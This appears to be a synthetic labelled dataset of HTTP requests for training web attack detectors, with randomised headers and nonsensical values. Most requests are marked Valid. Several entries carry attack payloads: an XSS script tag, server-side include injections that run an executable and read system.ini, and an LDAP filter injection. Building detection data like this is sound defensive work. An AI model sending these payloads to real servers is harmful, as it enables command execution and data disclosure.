If-Unmodified-Since: Fri, 19 Mar 10 18:02:26 UTC
If-Match: *
If-None-Match: *
If-Range: "grbdX_LiTVkoBUW"
Max-Forwards: 5
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Digest cnonce="hocliaa"
Range: -38,162-85,-031
Referer: http://gcg1tip.com/0h8tA/sr4od/rtbneni.tiff
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: 7oYof (iFdXVnk; ecOK21dVWb; rJzI_rX; mwU5RstsP)
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3327x2128
Via: FTP/2.3 150.49.206.40, FTP/2.9 www.ytEoin.shtml
Transfer-Encoding: identity
Upgrade: zizt/1.0, Nfsr/7.3, araJv/5.9, 0athyr/9.5, 7a2ey/9.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 9747150150274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35649
Start - Id: 32848
class: Valid
POST /tedoo8mot1h0ptRrmem/cmtaL.aspx? HTTP/1.1
Content-Length: 43
Content-Language: 1xe,eaa,lsex
Content-Encoding: compress
Content-Location: /a25EEIh/le62xu/7aap/itasI1wn.jsp
Content-MD5: c3RzVGRlYVRUYW5xZXNhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Jan 09 13:22:26 CET
Last-Modified: Mon, 26 Jul 04 12:05:21 CET
Host: 242.60.57.44:80
Connection: keep-alive
Accept: application/rtf
Accept-Charset: euc-kr
Accept-Encoding: compress;q=0.5, deflate;q=0.9, gzip;q=0.2, identity
Accept-Language: sh-hnAnnzl;q=0.9, niftsd-gen, Bebeyu-n;q=0.4, e-ec3dnnt;q=0.4
Cache-Control: fq2rl='ol1tlio'
Client-ip: 50.137.205.249
Cookie: rna9ytkcUqwiqex=smtHsqo
Cookie2: $Version="7"
Date: Wed, 25 Jul 07 09:10:04 CET
ETag: W/"j35BgT1UD2yy6TnJ"
Expect: 100-continue
From: 5awfaf@mr4qc.org
If-Modified-Since: Tue, 16 Dec 08 24:22:01 UTC
If-Unmodified-Since: Tue, 27 Mar 07 10:16:48 UTC
If-Match: *
If-None-Match: *
If-Range: "nXwtoW76s.8jl@x4"
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: Basic ZWN1M2U6MHRVYmllYWU=
Range: 2086-1,90-
Referer: http://www.mOhXtiA.ch/etEi/ynows/srcquy0/sDierd.tar.gz
TE: chunked,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/6.8 (Machintosh; U; Mac OS X 7.5; e7-gT; rv:0.0.3) Gecko/43700055
UA-CPU: StrongARM
UA-Disp: 1358,6257,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: S5n/5.1 www.sg3qtet.htm
Transfer-Encoding: identity
Upgrade: d8jw0/9.1
Warning: 539 174.52.125.218:7 "gaeepmhroih" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

zktdgnN=ra]w?we4wad%er&reIeo=99406866

End - Id: 32848
Start - Id: 23259
class: Valid
GET /0zOO/cErT/sAuPUgiolthmTvKlrr/access_logstyleueHwget/m.J6pE.php4? HTTP/1.0
Host: 111.168.210.19
Connection: close
Accept: text/*, audio/basic
Accept-Charset: hz-gb-2312;q=0.6, utf-7;q=0.2, iso-2022-jp, iso-2022-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 174.132.47.189
Cookie: uTixwgetB-ls-G=aeoafTlA0niotsoi
Cookie2: $Version="8"
Date: Tue, 13 Apr 10 06:28:05 GMT
ETag: W/"4Vez3-g0IHgz9o4jot"
Expect: 100-continue
From: aFofh@flsmtees.ch
If-Modified-Since: Wed, 10 Nov 04 01:24:45 GMT
If-Unmodified-Since: Fri, 14 Oct 05 02:56:41 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Dec 05 02:27:31 UTC
Max-Forwards: 4226
MIME-Version: 4.6
Pragma: Llk2hofa=a
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: Digest opaque="tbtauetc"
Range: 36-367,16-
Referer: http://www.eWlj9t.st/ibif/u2aerpei/siacr81l/q2tii.mp3
TE: trailers,deflate;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/2.0 (Machintosh; U; PPC Mac OS X 0.9; be-eE; rv:1.2.9) Gecko/21539049
UA-CPU: StrongARM
UA-Disp: 623,0567,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 386x656
Via: HTTP/3.6 159.109.162.160
Transfer-Encoding: identity
Upgrade: atinoz/5.3, liht/0.8, qeeon/5.8, aucer/1.3
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 85.19.231.197
X-Serial-Number: 736748310370
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23259
Start - Id: 7119
class: Valid
POST /EEwtegh3blargXamya/nS.A9x05adLjK/vd2xj/etntntc/ns0tRisaaqTT.php? HTTP/1.0
Content-Length: 263
Content-Language: gdo
Content-Encoding: deflate
Content-Location: /dyyilk/ethietrx/h4sei2eh/jmcngul.cgi
Content-MD5: aWRhc3R1dHJlbWVuc2hBNg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Oct 07 11:06:25 GMT
Last-Modified: Sat, 19 Jul 08 16:33:27 CET
Host: 204.224.103.9
Connection: keep-alive
Accept: text/*, text/*
Accept-Charset: koi8;q=0.6, x-mac-chinesetrad, utf-8, euc-tw;q=0.7
Accept-Encoding: identity;q=0.1, identity;q=0.5, compress;q=0.4, compress;q=0.2, identity;q=0.5
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 140.193.82.206
Cookie: gaers2rwr32to56=nclawlL7oiNeilhceb;bee=%|wr] n7sk objectl ;mess=15482;72w=rGYTvEvwq
Cookie2: $Version="42"
Date: Thu, 20 Jan 05 22:32:56 UTC
ETag: "YWfEAKRtn_k6G1Cuo8dc"
Expect: swrdoohr
From: vcgssiei@iyce.cz
If-Modified-Since: Sat, 04 Apr 09 06:50:20 GMT
If-Unmodified-Since: Tue, 29 May 07 09:12:04 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Oct 05 24:51:38 UTC
Max-Forwards: 1
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic eWllZ29hOnFva3AwMnJl
Authorization: NTLM ZW5lZ3pldHRhM2xvbThSb3M3aGR4aWVJbnJmcTlpeWE=
Range: -46242
Referer: /slha/slpinl/e9tdrtst/duareag.gif
TE: trailers
Trailer: TE
User-Agent: Mozilla/5.7 (Windows; U; WinNT 3.7; as-Re; rv:5.7.0) Gecko/08135779
UA-CPU: x86
UA-Disp: 9784,4196,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 867x014
Via: 7.9 www.Igwd.shtml, 5.2 48.115.220.58, HTTP/2.1 www.eeeoast1.jpg
Transfer-Encoding: identity
Upgrade: naope/7.6, h0e/8.7, saidc/2.3, iIxtnt/4.3
Warning: 288 www.thnieil.tiff "ono32ramres" "Tue, 12 Jan 10 22:01:15 CET"
X-Forwarded-For: 212.135.218.165
X-Serial-Number: 9930337775098315
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MJvP_25H=xAvaentm&cA3Rb007tnm=ecLLhGD9&ct4W2.shutdownpositionbh=t_Qg4kmJ4X&j@SoptbFBFe=766423&ziN5ssPnr=eeTakae6jnwpiN&hda4jon6SrmohoH=ssa1tec7ice2&crgytdmintnc=k4&bXdtmpFcat=etcc6nseva5gmn&dhr8rp=erasrfhdm&fvQpwvNZ_delete=vwindow.openAwn &ts= 1&t8n9abiqtuy=?Gw

End - Id: 7119
Start - Id: 7368
class: Valid
PUT /Tiwrrted/aftpK/hQ.j6bDdYAyoQ4m_1wXE/nV8QxbyzYv/ogosfrleevtotI/ejFpYi76dcD8/ihherkn1lnutvrCehxE8/ogce59tsp2deT/rzM.cfm? HTTP/1.0
Content-Length: 26
Content-Language: ur,nh
Content-Encoding: gzip
Content-Location: http://www.vOoO.biz/s1sitel/rHsthaet.htm
Content-MD5: aWlocmh1YnJFZXRuckVlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 May 09 07:15:51 GMT
Last-Modified: Mon, 03 Dec 07 22:14:25 CET
Host: 9.38.52.227:32098
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.9
Accept-Language: ronci-lymeQd;q=0.4, ze-b, Tlto-ssosw, t-ducer, tmeectYo-s4aWsm;q=0.4
Cache-Control: tcSom='7dehua'
Client-ip: 40.118.223.19
Cookie: fHbtu.Uall8= go2;Hr=gse+se2ewm9d;em=nn2o;sovhyases5h4z=uu'jae;Mea=90195
Cookie2: $Version="374"
Date: Mon, 27 Jul 09 23:25:47 UTC
ETag: "4n1OEXxdHpCrGn1"
Expect: 100-continue
From: toboche@ata6xsirt.st
If-Modified-Since: Mon, 19 Oct 09 14:43:23 CET
If-Unmodified-Since: Fri, 12 Nov 04 21:56:47 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 12
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM dGoyc3RobnNpSTdjbUVlYXVoZW1lM3RhbW8wT21vdFJJbjZldnJjMDdEZWdhSW9z
Authorization: s5mo1 rsmk4t=qpt8
Range: -69050,-4,502550-
Referer: http://www.rbuull.com/re3ryaa.php
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.8 (Windows; U; WinNT 4.8; yr-ui; rv:2.7.9) Gecko/67952856
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 850x401
Via: 9.2 www.dr3T.tiff:586
Transfer-Encoding: yeajhe; sywno=a3oh
Upgrade: Tcl/1.4, hde/4.4, fe2s6/8.8, prra/7.3, ta2/1.0
Warning: 556 134.7.7.53 "loiQefflen" 
X-Forwarded-For: 199.98.82.192
X-Serial-Number: 33978029627174385263
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hb4itAeeCagrode=eOoIRCe6z5

End - Id: 7368
Start - Id: 33929
class: Valid
POST /hn1r-IccAV3Mgt/tu5AxjFEZPYfk/me/nhrvsraeeesoucee/0JatelnetGqFu/z8DhrpZn4KMe9hPHS/s.JOQJlEuln8c8R.jpg? HTTP/1.1
Content-Length: 104
Content-Language: liQ,I
Content-Encoding: compress
Content-Location: /oeah.msf
Content-MD5: MFllZWNicmlvME5NaW5IVA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Aug 09 02:21:07 CET
Last-Modified: Sun, 12 Jul 09 13:21:22 UTC
Host: 90.71.122.171:817
Connection: e9teEur
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: kzM-nc;q=0.5, xs6gmoo-u1h;q=0.0, oNd6nci-uzso;q=0.2
Cache-Control: only-if-cached
Client-ip: 209.129.239.30
Cookie: XVAWnGztsetee=ecneoscripttewp
Cookie2: $Version="74"
Date: Sat, 15 Mar 08 11:25:31 UTC
ETag: "OXFSextK3FfDi7h"
Expect: ecitT
From: faUspl3@yqiAa4o.it
If-Modified-Since: Wed, 04 Aug 04 04:31:16 UTC
If-Unmodified-Since: Mon, 29 Nov 04 05:27:56 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1426
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: NTLM ZWlzcHE4R2x4Vm8wOGhhYXJscGQ4ZWd0aXJFUmU0RWFlaWNwQm1sbWROYWQ=
Range: -996,858-589875
Referer: http://www.eteetid.uk/ss4npxh/ishb/t6eoso.php4
TE: gzip;q=0.0,gzip;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.4 (compatible; Konqueror/8.0; Linux i586; atme; ie6odacpb; desge)
UA-CPU: x86
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: rm7/1.2 193.114.96.252, HTTP/4.7 96.95.192.172, HTTP/8.7 24.70.47.255
Transfer-Encoding: identity
Upgrade: mtiv/1.9, Samgmt/6.9, enjtl/7.4
Warning: 795 168.131.85.71 "htNrsta0stixj" "Thu, 18 Mar 04 22:40:39 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 346952667269
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etiwifKianasdiO=ole&Tirhgtj=No5h&6RletBh1=3nwn6z6s divnj&ruO-M8Da3Rk=7&hysrS=29&raone=7861&maOendwrrvT=7

End - Id: 33929
Start - Id: 46531
class: XSS
GET /<SCRIPT>/? HTTP/1.0
Host: www.uutePcNtht.org
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: euc-kr;q=0.6, hz-gb-2312;q=0.6, x-mac-korean, euc-tw;q=0.7
Accept-Encoding: deflate;q=0.9, identity, compress;q=0.3, compress;q=0.0, gzip;q=0.8
Accept-Language: ocu4SHe-sh, eNbe-yr;q=0.4, ljpT-olrie8d;q=0.2, 6mrp9d-esn19sb;q=0.7, pr9teVee-riUnzc4
Cache-Control: only-if-cached
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="23"
Date: Sun, 18 Apr 10 10:04:05 GMT
ETag: "aNVJT2lKpqFCO9DMA"
Expect: ta8rcs
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 27 Nov 05 11:09:58 CET
If-Unmodified-Since: Sat, 21 Feb 04 12:12:06 CET
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "--MkXcQZKkE5hke"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: http://www.Ivmemmr.ch/sihles/dtue/irfoh/reeprFe/ymeaEne.js
TE: trailers
Trailer: If-None-Match
User-Agent: beo0ysph/0.1.9.0.7
UA-CPU: x86
UA-Disp: 9426,1336,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/4.1 www.usAoaoei.jpeg, 6.2 8.43.235.100:254
Transfer-Encoding: compress
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46531
Start - Id: 10191
class: Valid
GET /KrlhavingopteEJ/Zb7uE-i8y/DhnsieesQ/Sns3t/sllnawroenLfTp7i0qb.dll?iuJ0d09tP=a5N2ZyT&OEhr106chusr-W=2&c9sniiT=lnaSes4Ilaetmp%24&SQsamC=Rgosevfi3l&i4rnyurnxewiv=o-NQnT4bEKYf&tiadb9eihbb=2659&ereejdtre=6&rHikrswstmi=020941&iwwed4=edlpbl&awinntliken4RVKD.P=s87 HTTP/1.1
Host: www.htrpy.gov:0986
Connection: close
Accept: text/html;q=0.2, image/*;q=0.5
Accept-Charset: x-mac-korean, utf-8;q=0.5, iso-2022-kr;q=0.7, windows-1250;q=0.1, iso-8859-7
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.107.40.218
Cookie: nl=bohb6fh
Cookie2: $Version="4"
Date: Sun, 18 Jan 04 20:11:56 UTC
ETag: W/"KVsV8336Mfx0luD"
Expect: 100-continue
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Sat, 02 May 09 13:13:05 GMT
If-Unmodified-Since: Wed, 03 Aug 05 24:07:38 UTC
If-Match: "E23q_zFlIqSOHp3vz"
If-None-Match: "Sr2qJXNMHoTn@fjvlMC4"
If-Range: Sat, 26 Feb 05 02:27:49 GMT
Max-Forwards: 10
MIME-Version: 8.3
Pragma: MM=thw8
Proxy-Authorization: Digest nonce
Authorization: oo2lr c8oint=hem9etHp
Range: 123813-
Referer: /uttrso/EResp0.php3
TE: trailers,chunked;q=0.0
Trailer: Warning
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 2.0; ts-Fl; rv:0.4.7) Gecko/38768865
UA-CPU: x86
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: leb/4.8 200.25.76.151, 4.7 www.so5ht7e.js
Transfer-Encoding: deflate
Upgrade: ins/3.6, med/5.8, ubr37/1.5, ebeas/3.0
Warning: 883 128.255.237.86:2 "Ssnka" "Sat, 21 Feb 04 17:15:22 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 62709231
----: -------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10191
Start - Id: 32742
class: Valid
POST /ir3./fadminWBltelnetx/udnCNK1SKdwO2ta_Dk8/Z3muwALWQtgVdropI/aefrt0eriefsYhuhb9/orocarqreihc/QNl67rPLBDUG@2/5SJwindow.opendf/sgaw3vhu/sd6WKBA7owlVVQjaYtj4.css? HTTP/1.1
Content-Length: 93
Content-Language: pppbheow
Content-Encoding: deflate
Content-Location: /nontly2/hodner.css
Content-MD5: eWE5dE5uMm5jamlpaU53bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Nov 07 14:31:08 GMT
Last-Modified: Sun, 30 Sep 07 17:12:57 UTC
Host: 155.171.198.144
Connection: fslkyAur
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: hy-alargby;q=0.2
Cache-Control: max-age=47019
Client-ip: 33.225.104.136
Cookie: t2stf4fIara=nfiIorls=eXth;hita=yda9o6i
Cookie2: $Version="215"
Date: Thu, 20 May 04 12:07:26 CET
ETag: "DQIA4FNXk3bUu6jCig"
Expect: 100-continue
From: ynuuOeYe@e4oe.com
If-Modified-Since: Fri, 27 Nov 09 11:06:20 UTC
If-Unmodified-Since: Thu, 19 Apr 07 03:04:01 UTC
If-Match: "l9RDjivVEVHkJJ-P7"
If-None-Match: *
If-Range: Sat, 14 Jan 06 01:45:42 CET
Max-Forwards: 7
MIME-Version: 2.1
Pragma: s3nrwt=e
Proxy-Authorization: NTLM bTR0ZWlyMnBpYW15ZXR0NWxlcGFoM2VpdDZzYTR1YWlyRXJvc25uaXQ=
Authorization: Basic OXVuYTpuc2ww
Range: -5,-0440
Referer: http://www.hautS.org/eusairAL/t5Evliii/wi7e/tcroyhon/ylRip.php3
TE: deflate,trailers,trailers
Trailer: Trailer
User-Agent: assi (iTz@8v)
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1032x4856
Via: FTP/3.2 www.mkIaes.png, 2.7 231.206.184.11
Transfer-Encoding: deflate
Upgrade: ndu/3.8
Warning: 192 5.69.98.20 "aslrVau" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 16114956793159
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

geewouaao=Fgliegtiy1t&tstaecorenvrihI=88364965&yboot.inidE12binDstdincH=70&0lnatapoeha=184798

End - Id: 32742
Start - Id: 40343
class: SSI
GET /oodAohQ_/sWahtpassd0EZiTy/fLsTuehegueaglteoek/nigateHroa/hbk1YrP08M/USiterNilRgdni/wRGXeJSxC/ulh8uncuyfzsnmNsd/tnas/iorrp.jpeg?higoeaac8y8do=8&Oht=fnV+&Hisetenfrv=055&Nk-.r.=24682&uuhdDehebR8wles=041003253&Nehek=%3C%21--++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Cgewb%5Cdgi%5Cn4.exe+++d%3A%5CnLiIS%5Cwww.olre.org%5ClTnn7amrrw%5Cdatabase.mdb++%2Fx++++exporttofoxpro%22--%3E&1ennfRhqnsgeoxt=tQ&oujnnctyve=t2hgo HTTP/1.0
Host: www.uSspienaar.uk
Connection: close
Accept: image/*
Accept-Charset: iso-8859-9, windows-1253;q=0.3, iso-8859-4, iso-8859-15, iso-8859-9;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: sj5-nkeh;q=0.1
Cache-Control: max-age=6874
Client-ip: 29.195.65.50
Cookie: bomut= echou|skat k%ts?;kthEehnmyR7c=ss;lapdjesttantnr9=82;newaw=3300;uJEiVnN5ui=ihne
Cookie2: $Version="3"
Date: Wed, 27 Feb 08 19:45:16 CET
ETag: W/"sixONzZFOaxVNExZ-Zd6"
Expect: 100-continue
If-Modified-Since: Thu, 03 Jul 08 04:44:21 UTC
If-Unmodified-Since: Sun, 26 Aug 07 23:51:29 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Jun 05 18:42:08 CET
Max-Forwards: 455
Pragma: no-cache
Range: -601,-84841,57-6653
Referer: /ielrheu/anux/joma/apTtld.tiff
User-Agent: avsN/1.9.1.2.4
UA-OS: Windows NT
Transfer-Encoding: identity
----: --------------------------

null

End - Id: 40343
Start - Id: 40659
class: SSI
GET /s2eEtbzr5ye/lkRrb4vLQUXodyaHF32-.gif?.rsamZ7=pr%5D%7Cnaunode%27%24&xdrganeyeus=+5&cc@2=%24&ihEioaeiuls=unionletc&q28sbWSt=510&7Teoebral=90171&kiEcye=ftpn1tgntqnrrj&4i=zSlpnerrhAposvmri6&da9=06666714&rleen=a%3Dkposition5s+rgvst&sne8rdrldirhae=t83uao%3F9in&eodRplo1tarO=%3C%21--+++++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&nss=nnnajsocwgetoidbxdn HTTP/1.1
Host: 140.244.45.167:7
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, windows-1251, iso-8859-2;q=0.3, cp-950, gb2312
Accept-Encoding: deflate;q=0.5
Accept-Language: Pxdec-cj;q=0.6, aewtC-esehE;q=0.9, tepi-d, oe-Ohtks;q=0.9
Cache-Control: max-age=25435
Client-ip: 248.142.217.61
Cookie: Sprtqadrm0otEs=iwi;o9l4sd6oItT0u=ozUnVN.M98x;swset=955
Cookie2: $Version="43"
Date: Sun, 30 Dec 07 06:52:49 GMT
ETag: "Wx2dKH1wi9MYU.2"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Thu, 12 May 05 05:39:04 UTC
If-Unmodified-Since: Fri, 10 Sep 04 24:39:59 UTC
If-Match: *
If-None-Match: "5vRZt@-UWRardWndzh8m"
If-Range: "KRQC289Z68WgMkPD2"
Max-Forwards: 7013
MIME-Version: 2.6
Pragma: sl=nG
Authorization: Basic YWFkbG5oTVE6dHRBMmVtcg==
Referer: /g7ifs/G6al9idh/r8Osnfc/0Sg4Tett/tto6ib9e.jsp
TE: deflate,trailers,chunked;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/7.5 (compatible; Konqueror/8.0; SunOS sun4u; wesstao; o9Rsmle; edao5S3o)
UA-Disp: 574,0063,16
UA-Color: color32
Via: 0.8 116.106.182.104
Transfer-Encoding: olnood
Upgrade: o5x/8.1, nocyr/9.6, efmda/6.0
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40659
Start - Id: 3302
class: Valid
GET /ex6Lvx.htm?-0@fA0=11425067&2DbopenZ0=ge&ieiaeeraaa=mgn5tKrroeeawni&eh=roc%24&ngnliiqBen=oXYb0&eHqaeet0=a0zohRbOdu_&jFQFxDC6=tIGza9i9t&i1Pi=4275378725&2eNlcGiyot=ns&b0ildeeomu=4120770&ozcsIBih=e+between&EkexeclAHsck=%5C+I-&lAsf53esorzpe=28087&gnsl6odwbiobt=z6tsui HTTP/1.0
Host: www.ltabroNL.biz
Connection: close
Accept: */*
Accept-Charset: windows-1257;q=0.2, utf-7, x-mac-chinesesimp, shift_jis;q=0.5, x-mac-chinesetrad;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2515
Client-ip: 134.201.181.61
Cookie: 9asstAc=rD_xJru;loaAlkin=qiatla%;ie3roD5n=hBksiaImemakzenrnn;cetoy0i4io=emapasswdti wpiee;7fHettt=passwd;ewkirsi5etrI=4544863718
Cookie2: $Version="250"
Date: Sat, 22 Sep 07 08:58:34 GMT
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: obew1
From: gooi@er7rmrhs.st
If-Modified-Since: Sun, 31 Oct 04 13:37:11 UTC
If-Unmodified-Since: Sat, 09 Oct 04 23:51:19 CET
If-Match: "BdFMO597hpFUiopd"
If-None-Match: *
If-Range: Wed, 09 Mar 05 01:22:23 CET
Max-Forwards: 779
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: NTLM Y2d0cmh2bHRTdGVrbjdqZTduaG1ERGltYW1xY2l3dXdob2l0Y2lwZW1h
Range: 715429-,64862-,731-870612
Referer: http://feh3.fr/Y4fcahT/iaiu/pGhc2Gs/aee6e.php4
TE: trailers,gzip;q=0.8,trailers
Trailer: Upgrade
User-Agent: m1nai (n1QH2Gj7s; aKE08W; uwVAYJZ24T; yyA6RTh)
UA-CPU: PowerPC
UA-Disp: 517,125,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 179x3842
Via: FTP/4.3 www.8ec7b.css, 6.3 www.eifke.js
Transfer-Encoding: aerle; ocCaaezG=0enis
Upgrade: hsoEu/9.9
Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 671477546416397721
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3302
Start - Id: 37600
class: LdapInjection
POST /sJN5Sz@z/8ehdayampnr.shtml? HTTP/1.1
Content-Length: 306
Content-Language: si,ya9hn,rhcgfuif
Content-Encoding: deflate
Content-Location: http://aaqtloap.de/TObsAfR6/2sgE/oSeTfs6/psrod.nsf
Content-MD5: ZXR1Z2Rpb1RwZHpzZ2lkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Aug 09 14:07:46 UTC
Last-Modified: Fri, 04 Aug 06 09:31:37 CET
Host: 159.169.128.1:80
Connection: keep-alive
Accept: image/*;q=0.2, application/*, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.0, identity;q=0.1, gzip
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 232.58.119.182
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="2"
Date: Wed, 19 Oct 05 12:44:19 UTC
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: jx1d@1fuiaeebw.uk
If-Modified-Since: Sat, 08 Jul 06 22:07:16 GMT
If-Unmodified-Since: Fri, 20 Aug 04 20:31:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 399
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM Z2YxM2lmdHl0aG1udG1ydEF0cm9BV2U4aUF3cnJ0dzBJbmxlbW5ybjd0
Range: 2-4,-9680
Referer: /unis.php3
TE: chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.5 (compatible; eeadsboe; Solaris; odtbdN9r; nijTc7trc)
UA-CPU: PowerPC
UA-Disp: 752,1342,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: 2.2 201.112.45.110
Transfer-Encoding: deflate
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hr5E=ktfdreplace&eRtmRousopFoni=49351&tei=1@19_@-_&h_HtpynAcwE=eaa>mujrw&ViinLw=@a &imgqnptmpdivr= rncfn5o-aS&oolhi3w0e68t4=)(|   (displayName=had*)  (name  =  had*   )(  mail=had*)&JobjectOgt8.Os= gR5fc=copyrtt8r lHkn&netnar=1hLreneRentw9i&rfdhpNtt=H7q+ser&hojo=7769186

End - Id: 37600
Start - Id: 34656
class: Valid
PUT /mnf/ecmaten3y1tba/iw/yPcxBT/eospimeg/DUg/igp6jusfrU.cfm? HTTP/1.1
Content-Length: 206
Content-Language: aenU,o8esisue
Content-Encoding: identity
Content-Location: /mgyaau1.sh
Content-MD5: MjVza1VlY29hdHEwdW1pZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Aug 07 24:02:54 UTC
Last-Modified: Sun, 05 Feb 06 21:28:17 UTC
Host: 104.236.234.169
Connection: iotMt6
Accept: image/*
Accept-Charset: iso-8859-1, iso-8859-9;q=0.5, windows-874, windows-1250, x-mac-cyrillic
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 7.17.239.44
Cookie: tnede7ha=5 ;dgrc0statdnn=yf8itmr;Ozhutied=7361
Cookie2: $Version="2"
Date: Tue, 18 Jul 06 22:22:53 GMT
ETag: W/"Mp81rpz3h44Y7GaB9"
